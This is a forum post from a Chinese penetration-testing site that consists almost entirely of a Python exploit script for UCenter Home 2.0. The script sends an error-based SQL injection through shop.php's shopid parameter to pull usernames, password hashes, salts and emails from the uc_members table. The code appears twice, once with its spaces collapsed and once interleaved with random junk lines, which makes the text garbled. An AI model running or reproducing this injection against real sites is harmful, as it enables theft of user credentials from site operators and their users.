中国网络渗透测试联盟
标题:
UCenter Home 2.0 EXP
[打印本页]
作者:
admin
时间:
2013-1-23 09:18
标题:
UCenter Home 2.0 EXP
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:
http://www.exploit-db.com/exploits/14997/'
print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
7 N+ m% K) Q" O/ I9 r) a0 U
9 W! a7 N3 W) J9 q
8 o6 F: c7 y6 }! }! u9 s
#!/usr/bin/env python
: a4 ^7 T; |! A& |# n7 X
' g9 C0 r: N, z c
import sys
- F5 P6 D/ @9 S& y% B/ T
import urllib2
* h7 J s1 N" S' d& a
import re
$ r2 E/ m# W3 J5 t& L: N. p) k
' d5 U/ w' N) D! ^; z. E/ [& a
def info():
N0 N7 E+ e' z4 G* L) V
print 'From:
http://www.exploit-db.com/exploits/14997/'
! n: k' K! k c& A0 @ C2 g
print 'http://www.hake.cc/Web_loudong/'
- b1 I/ K! S2 d- b* W+ [
print 'changed:qiaoy'
, s4 \$ A1 g6 l- `2 D6 j6 R
print 'exp:'
2 J t" v x, n' o; E) J7 d3 A
print ' ./UCenter_Home_2.0.py site'
* c0 B k' F" R2 R2 [3 `" n4 W
3 j. R! _2 u, ?3 W* j* ~9 ^
def main():
/ ?8 k$ W% d4 a& v- a; ?& p
if len(sys.argv) != 2:
& _0 M7 z( ]% |9 Z$ p
info()
3 p8 K4 i8 f8 c; W9 ~# c
else:
9 C8 D( U9 r0 t
site = sys.argv[1]
' B# ^+ _$ p$ S- \/ m
if site[0:7] == 'http://':
2 w3 k+ q$ K( v6 N3 d# S1 @
sitesite =site
" t2 j/ E1 ?, B& G) S3 X9 ~8 F( ]6 u
elif site[0:8] == 'https://':
) q3 U6 M: ~6 o! H/ F) J
sitesite = site
* _0 q7 `3 z' n; _* R3 t. H/ w* X) p
else:
0 O2 j% a1 F) [) Y, C
site = 'http://'+site
( b& | R2 P7 e6 `$ i8 E
try:
: Q3 U8 G- `. @! d4 v% l5 T
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
: x+ G& x& K6 `- y
Value = urllib2.urlopen(url).read()
# E$ n, A t0 ?# m) }
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
7 g7 D+ F0 Q) G% \3 C
hacked = Msg.split(':')
1 K( \! \/ O3 `; H; o$ }. V* s& Q
print 'Name: '+hacked[1]
4 q* v1 Q" K9 \ D5 r
print 'Passwd: '+hacked[2]
6 \6 J9 r. @- y' p: o7 a/ y* t4 J4 H
print 'salt: '+hacked[3]
; }: h* R# E: o* p( A6 z
print 'email: '+hacked[4]
" A4 P. \1 o& }* y# h
except:
; V; t- K- y7 @4 J) W
print 'Sorry,I can\'t work............'
* s- c7 C) F- @! J( \6 B8 k$ @! s2 L
' L0 [2 Y1 C8 R' W% D
if __name__ == '__main__':
. R9 ~5 t! i9 O6 |8 ~
main()
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2